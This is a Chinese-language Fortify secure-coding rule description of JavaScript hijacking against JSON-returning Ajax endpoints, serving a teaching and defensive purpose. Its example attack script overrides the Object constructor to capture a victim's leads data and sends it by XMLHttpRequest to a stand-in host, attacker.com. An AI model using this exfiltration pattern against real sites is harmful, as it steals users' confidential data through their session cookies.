<span id="7ztzv"></span>
<sub id="7ztzv"></sub>

<span id="7ztzv"></span><form id="7ztzv"></form>

<span id="7ztzv"></span>

        <address id="7ztzv"></address>

            JavaScript Hijacking: Ad Hoc Ajax

            ABSTRACT

            使用 JavaScript 符號來傳送敏感數據的應用程序可能會存在 JavaScript hijacking 的漏洞,該漏洞允許未經授權的攻擊者從一個易受攻擊的應用程序中讀取機密數據。

            EXPLANATION

            如果發生以下情況,應用程序可能會很容易受到 JavaScript hijacking [1] 的攻擊:
            — 使用 JavaScript 作為數據傳輸格式
            — 處理機密信息
            因為 JavaScript hijacking 漏洞不會作為編碼錯誤的直接結果出現,HP Fortify 安全編碼規則包通過鑒別在 HTTP 響應中產生 JavaScript 的代碼,引起人們對潛在的 JavaScript hijacking 漏洞的注意。
            Web 瀏覽器執行同源策略 (Same Origin Policy),以保護用戶免受惡意網站的攻擊。同源策略 (Same Origin Policy) 規定:如果要使用 JavaScript 來訪問某個網頁的內容的話,則 JavaScript 和網頁必須都來源于相同的域。若不采取同源策略 (Same Origin Policy),惡意網站便可以使用客戶端憑證來運行 JavaScript,從其他網站加載的敏感信息,并對這些信息進行提煉,然后將其返回給攻擊者。
            通過 JavaScript 劫持,攻擊者可以繞過 Web 應用程序中使用的同源策略 (Same Origin Policy),該應用程序使用 JavaScript 來交流機密信息。同源策略 (Same Origin Policy) 中的漏洞是:通過這一策略,任何網站的 JavaScript 都可以被其他網站的上下文包含或執行。即使惡意網站不能直接在客戶端上檢查易受攻擊的站點中加載的所有數據,但它仍可以通過配置一個特定的環境利用該漏洞。有了這樣的環境,惡意網站就可以監視 JavaScript 的執行過程和任何可能發生的相關負面效應。由于許多 Web 2.0 應用程序使用 JavaScript 作為數據傳輸機制,因此,與傳統的 Web 應用程序不同,它們往往很容易受到各種攻擊。
            JavaScript 中最常見的信息傳輸格式為 JavaScript Object Notation (JSON)。JSON RFC 將 JSON 語法定義為 JavaScript 類實例文本化定義語法 (object literal syntax)的子集。JSON 基于兩種數據結構類型:數組和對象。所有可以作為一個或多個有效 JavaScript 語句進行解析的數據傳送格式都容易受到 JavaScript 劫持的攻擊。JSON 使 JavaScript 劫持變得更加容易,因為 JSON 數組堅持認為它自己就是有效的 JavaScript 指令。因為數組是交換列表的一種正常形式,在應用程序需要交換多個值時會普遍使用該形式。換句話說,一個 JSON 數組會直接受到 JavaScript 劫持的攻擊。一個 JSON 對象只在其被一些其他 JavaScript 結構包圍時才會受到攻擊,這些 JavaScript 結構堅持認為它們自己就是有效的 JavaScript 指令。
            例 1:在以下例子中,開頭顯示了一個在 Web 應用程序的客戶端和服務器組件之間進行的合法 JSON 交互,這一 Web 應用程序是用于管理潛在商機的。接下來,它說明了攻擊者如何模仿客戶端獲取服務器端返回的機密信息。注意,本例子是專為基于 Mozilla 的瀏覽器而編寫的代碼。若在創建對象時,沒有使用 new 運算符,則其他主流瀏覽器會禁止重載默認構造函數。
            客戶端向服務器請求數據,并通過以下代碼評估 JSON 結果:


            var object;
            var req = new XMLHttpRequest();
            req.open("GET", "/object.json",true);
            req.onreadystatechange = function () {
            if (req.readyState == 4) {
            var txt = req.responseText;
            object = eval("(" + txt + ")");
            req = null;
            }
            };
            req.send(null);


            當代碼運行時,會生成一個如下所示的 HTTP 請求:

            GET /object.json HTTP/1.1
            ...
            Host:www.example.com
            Cookie:JSESSIONID=F2rN6HopNzsfXFjHX1c5Ozxi0J5SQZTr4a5YJaSbAiTnRR

            (在本 HTTP 響應和隨后的響應中,我們省略了與該解釋沒有直接關系的 HTTP 頭信息。)
            服務器使用 JSON 格式的數組進行響應:

            HTTP/1.1 200 OK
            Cache-control:private
            Content-Type:text/javascript; charset=utf-8
            ...
            [{"fname":"Brian", "lname":"Chess", "phone":"6502135600",
            "purchases":60000.00, "email":"brian@fortifysoftware.com" },
            {"fname":"Katrina", "lname":"O'Neil", "phone":"6502135600",
            "purchases":120000.00, "email":"katrina@fortifysoftware.com" },
            {"fname":"Jacob", "lname":"West", "phone":"6502135600",
            "purchases":45000.00, "email":"jacob@fortifysoftware.com" }]

            這種情況下,JSON 中包含了與當前用戶相關的機密信息(一組潛在商機數據)。其他用戶如果不知道該用戶的會話標識符,便無法訪問這些信息。(在大多數現代 Web 應用程序中,會話標識符存儲在 cookie 中。)然而,如果受害者訪問某個惡意網站,惡意網站就可以使用 JavaScript 劫持提取信息。
            如果受害者受到欺騙后,訪問包含以下惡意代碼的網頁,受害者的重要信息就會被發送到攻擊者的網站中。

            <script>
            // override the constructor used to create all objects so
            // that whenever the "email" field is set, the method
            // captureObject() will run.Since "email" is the final field,
            // this will allow us to steal the whole object.
            function Object() {
            this.email setter = captureObject;
            }

            // Send the captured object back to the attacker's Web site
            function captureObject(x) {
            var objString = "";
            for (fld in this) {
            objString += fld + ":" + this[fld] + ", ";
            }
            objString += "email:" + x;
            var req = new XMLHttpRequest();
            req.open("GET", "http://attacker.com?obj=" +
            escape(objString),true);
            req.send(null);
            }
            </script>

            <!-- Use a script tag to bring in victim's data -->
            <script src="http://www.example.com/object.json"></script>

            惡意代碼使用腳本標簽將 JSON 對象包含在當前頁面中。Web 瀏覽器在發送請求的同時,還會發送相應的會話 cookie。換句話說,在處理該請求時把它當作合法應用程序發出的請求。
            當 JSON 數組到達客戶端時,將會在惡意網頁的上下文中進行評估。為了看清對 JSON 的評估,惡意頁面已重新定義了用來創建新對象的 JavaScript 函數。通過這種方法,在惡意代碼中插入了一個鉤子,以便它獲得每個對象的創建權限,并將對象的內容傳回到惡意站點。其他攻擊者可能重載了默認的數組構造函數。
            有時,構建 mashup 中使用的應用程序需要在每個 JavaScript 消息的末尾調用一個回調函數。該回調函數的含義由 mashup 中的其他應用程序進行定義。攻擊者利用回調函數發動 JavaScript hijacking,借以攻擊某個微不足道的事物,其目的就是要定義該函數。針對應用程序的 mashup 要么是友好的,要么是安全的,但兩者不可皆得。
            即使用戶未登錄到某個易受攻擊的網站,攻擊者還可以要求用戶登錄,然后顯示該應用程序的合法登錄頁面。由于攻擊者并沒有獲取用戶的機密信息,這并不屬于釣魚攻擊,因此,反釣魚措施也無法對抗這種攻擊。
            更加復雜的攻擊可以使用 JavaScript 向應用程序發出一系列請求,從而動態生成所需的腳本標簽。同樣的技術有時還用來創建應用程序 mashup。唯一的區別在于,在 mashup 方法中會涉及惡意的應用程序。

            REFERENCES

            [1] B. Chess, Y. O'Neil, and J. West JavaScript Hijacking


            Copyright 2013 Fortify Software - All rights reserved.
            (Generated from version 2013.1.1.0008 of the Fortify Secure Coding Rulepacks)
            desc.dataflow.java.javascript_hijacking_ad_hoc_ajax

            <span id="7ztzv"></span>
            <sub id="7ztzv"></sub>

            <span id="7ztzv"></span><form id="7ztzv"></form>

            <span id="7ztzv"></span>

                  <address id="7ztzv"></address>

                      亚洲欧美在线